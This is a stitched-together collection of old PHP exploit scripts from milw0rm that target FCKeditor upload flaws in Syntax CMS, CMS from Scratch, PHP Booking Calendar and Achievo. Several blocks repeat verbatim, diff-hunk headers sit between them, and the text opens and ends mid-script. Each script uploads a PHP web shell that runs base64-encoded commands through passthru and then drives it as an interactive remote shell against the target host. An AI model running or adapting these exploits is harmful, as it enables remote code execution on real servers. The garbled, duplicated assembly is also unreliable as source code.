print "\n| Syntax CMS <= 1.3 Arbitrary File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /Syntax/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-29]
<?php
/*
--------------------------------------------------------------
Syntax CMS <= 1.3 (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
Gr33ts t0 : EgiX, ThE GeNeRal L0s3r , Houssamix ,Str0ke <==> special THanks to EgiX For the Exploit Code
author...: Stack
mail.....: Ev!L
descr:
if the web site change the name of path or path is /public/ you can delet /public/ in the exploit
in the line :
"POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php
[-] vulnerable code in /public/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n| Syntax CMS <= 1.3 Arbitrary File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /Syntax/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}public/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-29]

View file

@ -1,133 +1,133 @@
<?php
/*
-----------------------------------------------------------------
CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit
-----------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.[1].: http://cmsfromscratch.com/
link.[2].: http://cmsfromscratch.googlecode.com/files/cmsfs114b.tgz (tested package)
[-] vulnerable code in /cms/FCKeditor/editor/filemanager/connectors/php/config.php
27. // SECURITY: You must explicitelly enable this "connector". (Set it to "true").
28. // WARNING: don't just set "ConfigIsEnabled = true", you must be sure that only
29. // authenticated users can access this file or use some kind of session checking.
30. $Config['Enabled'] = true ; <======
31.
32. $path = $_SERVER["REQUEST_URI"] ;
33. $relativePathFromWebServerRoot = substr($path, 0, strpos($path, "/", 1) );
34. // Coming out as /CMS, why???
35.
36.
37.
38. // Path to user files relative to the document root.
39. // This is what is inserted into the HTML markup
40. $Config['UserFilesPath'] = urldecode(rtrim(str_replace('cms/FCKeditor/editor/filemanager/connectors/php', '', dirname($_SERVER['SCRIPT_NAME'])), '/')) ;
41. if ($Config['UserFilesPath'] == '') $Config['UserFilesPath'] = '/' ;
42.
43. // Fill the following value it you prefer to specify the absolute path for the user files directory. Useful if you are using a virtual directory, symbolic link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
44. // Attention: The above 'UserFilesPath' must point to the same directory.
45. // BH note: This is used for browsing the server.. should equate to the real path of the folder where /cms/ is installed
46. $Config['UserFilesAbsolutePath'] = realpath('../../../../../../') ;
47.
48. // Due to security issues with Apache modules, it is reccomended to leave the following setting enabled.
49. $Config['ForceSingleExtension'] = true ;
50. // Perform additional checks for image files
51. // if set to true, validate image size (using getimagesize)
52. $Config['SecureImageUploads'] = true;
53. // What the user can do with this connector
54. $Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;
55. // Allowed Resource Types
56. $Config['ConfigAllowedTypes'] = array('File', 'Image', 'Flash', 'Media') ;
57. // For security, HTML is allowed in the first Kb of data for files having the following extensions only.
58. $Config['HtmlExtensions'] = array("html", "htm", "xml", "xsd", "txt", "js") ;
59.
60. $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'php', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
61. $Config['DeniedExtensions']['File'] = array() ; <========
62. $Config['FileTypesPath']['File'] = $Config['UserFilesPath'] ;
63. $Config['FileTypesAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
64. $Config['QuickUploadPath']['File'] = $Config['UserFilesPath'] ;
65. $Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to
$Config['AllowedExtensions']['File'] array, used in IsAllowedExt() function to check the file's extension, contains also .php extension
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+---------------------------------------------------------------+";
print "\n| CMS from Scratch <= 1.1.3 Remote Shell Upload Exploit by EgiX |";
print "\n+---------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /cms114/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php\"\r\n";
$data .= "Content-Type: unknown/unknown\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/cms/FCKeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\ncmsfs-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (!eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-29]
<?php
/*
-----------------------------------------------------------------
CMS from Scratch <= 1.1.3 (fckeditor) Remote Shell Upload Exploit
-----------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.[1].: http://cmsfromscratch.com/
link.[2].: http://cmsfromscratch.googlecode.com/files/cmsfs114b.tgz (tested package)
[-] vulnerable code in /cms/FCKeditor/editor/filemanager/connectors/php/config.php
27. // SECURITY: You must explicitelly enable this "connector". (Set it to "true").
28. // WARNING: don't just set "ConfigIsEnabled = true", you must be sure that only
29. // authenticated users can access this file or use some kind of session checking.
30. $Config['Enabled'] = true ; <======
31.
32. $path = $_SERVER["REQUEST_URI"] ;
33. $relativePathFromWebServerRoot = substr($path, 0, strpos($path, "/", 1) );
34. // Coming out as /CMS, why???
35.
36.
37.
38. // Path to user files relative to the document root.
39. // This is what is inserted into the HTML markup
40. $Config['UserFilesPath'] = urldecode(rtrim(str_replace('cms/FCKeditor/editor/filemanager/connectors/php', '', dirname($_SERVER['SCRIPT_NAME'])), '/')) ;
41. if ($Config['UserFilesPath'] == '') $Config['UserFilesPath'] = '/' ;
42.
43. // Fill the following value it you prefer to specify the absolute path for the user files directory. Useful if you are using a virtual directory, symbolic link or alias. Examples: 'C:\\MySite\\userfiles\\' or '/root/mysite/userfiles/'.
44. // Attention: The above 'UserFilesPath' must point to the same directory.
45. // BH note: This is used for browsing the server.. should equate to the real path of the folder where /cms/ is installed
46. $Config['UserFilesAbsolutePath'] = realpath('../../../../../../') ;
47.
48. // Due to security issues with Apache modules, it is reccomended to leave the following setting enabled.
49. $Config['ForceSingleExtension'] = true ;
50. // Perform additional checks for image files
51. // if set to true, validate image size (using getimagesize)
52. $Config['SecureImageUploads'] = true;
53. // What the user can do with this connector
54. $Config['ConfigAllowedCommands'] = array('QuickUpload', 'FileUpload', 'GetFolders', 'GetFoldersAndFiles', 'CreateFolder') ;
55. // Allowed Resource Types
56. $Config['ConfigAllowedTypes'] = array('File', 'Image', 'Flash', 'Media') ;
57. // For security, HTML is allowed in the first Kb of data for files having the following extensions only.
58. $Config['HtmlExtensions'] = array("html", "htm", "xml", "xsd", "txt", "js") ;
59.
60. $Config['AllowedExtensions']['File'] = array('7z', 'aiff', 'asf', 'avi', 'bmp', 'csv', 'doc', 'fla', 'flv', 'gif', 'gz', 'gzip', 'jpeg', 'jpg', 'mid', 'mov', 'mp3', 'mp4', 'mpc', 'mpeg', 'mpg', 'ods', 'odt', 'pdf', 'php', 'png', 'ppt', 'pxd', 'qt', 'ram', 'rar', 'rm', 'rmi', 'rmvb', 'rtf', 'sdc', 'sitd', 'swf', 'sxc', 'sxw', 'tar', 'tgz', 'tif', 'tiff', 'txt', 'vsd', 'wav', 'wma', 'wmv', 'xls', 'xml', 'zip') ;
61. $Config['DeniedExtensions']['File'] = array() ; <========
62. $Config['FileTypesPath']['File'] = $Config['UserFilesPath'] ;
63. $Config['FileTypesAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
64. $Config['QuickUploadPath']['File'] = $Config['UserFilesPath'] ;
65. $Config['QuickUploadAbsolutePath']['File']= $Config['UserFilesAbsolutePath'] ;
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code due to
$Config['AllowedExtensions']['File'] array, used in IsAllowedExt() function to check the file's extension, contains also .php extension
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+---------------------------------------------------------------+";
print "\n| CMS from Scratch <= 1.1.3 Remote Shell Upload Exploit by EgiX |";
print "\n+---------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /cms114/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php\"\r\n";
$data .= "Content-Type: unknown/unknown\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/cms/FCKeditor/editor/filemanager/connectors/php/upload.php?Type=File HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\ncmsfs-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (!eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-29]

View file

@ -1,137 +1,137 @@
<?php
/*
--------------------------------------------------------------
PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
Special thnx for : Egix
[-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|PHP Booking Calendar 10d Arbitrary File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-29]
<?php
/*
--------------------------------------------------------------
PHP Booking Calendar 10 d (fckeditor) Arbitrary File Upload Exploit
--------------------------------------------------------------
Special thnx for : Egix
[-] vulnerable code in /[path]/fckeditor/editor/filemanager/upload/php/upload.php
41. // Get the posted file.
42. $oFile = $_FILES['NewFile'] ;
43.
44. // Get the uploaded file name and extension.
45. $sFileName = $oFile['name'] ;
46. $sOriginalFileName = $sFileName ;
47. $sExtension = substr( $sFileName, ( strrpos($sFileName, '.') + 1 ) ) ;
48. $sExtension = strtolower( $sExtension ) ;
49.
50. // The the file type (from the QueryString, by default 'File').
51. $sType = isset( $_GET['Type'] ) ? $_GET['Type'] : 'File' ;
52.
53. // Check if it is an allowed type.
54. if ( !in_array( $sType, array('File','Image','Flash','Media') ) )
55. SendResults( 1, '', '', 'Invalid type specified' ) ;
56.
57. // Get the allowed and denied extensions arrays.
58. $arAllowed = $Config['AllowedExtensions'][$sType] ;
59. $arDenied = $Config['DeniedExtensions'][$sType] ;
60.
61. // Check if it is an allowed extension.
62. if ( ( count($arAllowed) > 0 && !in_array( $sExtension, $arAllowed ) ) || ( count($arDenied) > 0 && in_array( $sExtension, $arDenied ) ) )
63. SendResults( '202' ) ;
64.
65. $sErrorNumber = '0' ;
66. $sFileUrl = '' ;
67.
68. // Initializes the counter used to rename the file, if another one with the same name already exists.
69. $iCounter = 0 ;
70.
71. // The the target directory.
72. if ( isset( $Config['UserFilesAbsolutePath'] ) )
73. $sServerDir = $Config['UserFilesAbsolutePath'] ;
74. else
75. //$sServerDir = GetRootPath() . $Config["UserFilesPath"] ;
76. $sServerDir = $Config["UserFilesPath"] ;
77.
78. while ( true )
79. {
80. // Compose the file path.
81. $sFilePath = $sServerDir . $sFileName ;
82.
83. // If a file with that name already exists.
84. if ( is_file( $sFilePath ) )
85. {
86. $iCounter++ ;
87. $sFileName = RemoveExtension( $sOriginalFileName ) . '(' . $iCounter . ').' . $sExtension ;
88. $sErrorNumber = '201' ;
89. }
90. else
91. {
92. move_uploaded_file( $oFile['tmp_name'], $sFilePath ) ;
93.
94. if ( is_file( $sFilePath ) )
95. {
96. $oldumask = umask(0) ;
97. chmod( $sFilePath, 0777 ) ;
98. umask( $oldumask ) ;
99. }
100.
101. $sFileUrl = $Config["UserFilesPath"] . $sFileName ;
102.
103. break ;
with a default configuration of this script, an attacker might be able to upload arbitrary files containing malicious PHP code
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
print "\n+------------------------------------------------------------+";
print "\n|PHP Booking Calendar 10d Arbitrary File Upload Exploit by Stack |";
print "\n+------------------------------------------------------------+\n";
if ($argc < 2)
{
print "\nUsage......: php $argv[0] host path";
print "\nExample....: php $argv[0] localhost /booking_calendar/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"s.php.he.ll\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}/fckeditor/editor/filemanager/upload/php/upload.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),\"(.*)\",\"(.*)\",/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]})\n");
else print "\n[-] Shell uploaded to {$html[2]}...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
print "\nstack-shell# ";
$cmd = trim(fgets(STDIN));
if ($cmd != "exit")
{
$packet = "GET {$path}datacenter/media/{$html[3]} HTTP/1.0\r\n";
$packet.= "Host: {$host}\r\n";
$packet.= "Cmd: ".base64_encode($cmd)."\r\n";
$packet.= "Connection: close\r\n\r\n";
$output = http_send($host, $packet);
if (eregi("print", $output) || !eregi("_code_", $output)) die("\n[-] Exploit failed...\n");
$shell = explode("_code_", $output);
print "\n{$shell[1]}";
}
else break;
}
?>
# milw0rm.com [2008-05-29]

View file

@ -1,125 +1,125 @@
<?php
/*
-----------------------------------------------------------------
Achievo <= 1.3.2 (fckeditor) Remote Arbitrary File Upload Exploit
-----------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.achievo.org/
details..: works only with a specific server configuration (e.g. an Apache server with the mod_mime module installed)
[-] vulnerable code in /atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
121. //File Area
122. $fckphp_config['ResourceAreas']['File'] =array(
123.
124. //Files(identified by extension) that may be uploaded to this area
125. 'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
with a default configuration of this script, an attacker might be able to upload arbitrary
files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
$sock = fsockopen($host, 80);
while (!$sock)
{
print "\n[-] No response from {$host}:80 Trying again...";
$sock = fsockopen($host, 80);
}
fputs($sock, $packet);
while (!feof($sock)) $resp .= fread($sock, 1024);
fclose($sock);
return $resp;
}
function upload()
{
global $host, $path;
$connector = "atk/attributes/fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
$file_ext = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
foreach ($file_ext as $ext)
{
print "\n[-] Trying to upload with .{$ext} extension...";
$data = "--12345\r\n";
$data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
$data .= "Content-Type: application/octet-stream\r\n\r\n";
$data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
$data .= "--12345--\r\n";
$packet = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($data)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $data;
preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
$packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
$html = http_send($host, $packet);
if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
sleep(1);
}
return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n| Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit by EgiX |";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
